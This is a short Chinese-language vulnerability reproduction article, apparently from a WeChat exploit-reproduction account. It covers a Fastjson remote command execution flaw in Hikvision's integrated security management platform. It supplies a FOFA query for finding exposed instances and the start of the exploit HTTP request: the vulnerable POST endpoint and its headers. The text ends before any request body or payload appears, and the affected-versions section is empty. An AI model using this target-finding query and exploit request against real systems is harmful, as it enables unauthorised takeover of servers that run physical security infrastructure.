文章目录
海康威视综合安防管理平台存在Fastjson远程命令执行漏洞
1. 海康威视综合安防管理平台简介
微信公众号搜索:南风漏洞复现文库
该文章 南风漏洞复现文库 公众号首发
综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度。
2.漏洞描述
海康威视综合安防管理平台存在Fastjson远程命令执行漏洞,该漏洞可执行系统命令,直接获取服务器权限。
3.影响版本
4.fofa 查询语句
app=“HIKVISION-综合安防管理平台”
5.漏洞复现
漏洞数据包如下:
POST /bic/ssoService/v1/applyCT HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp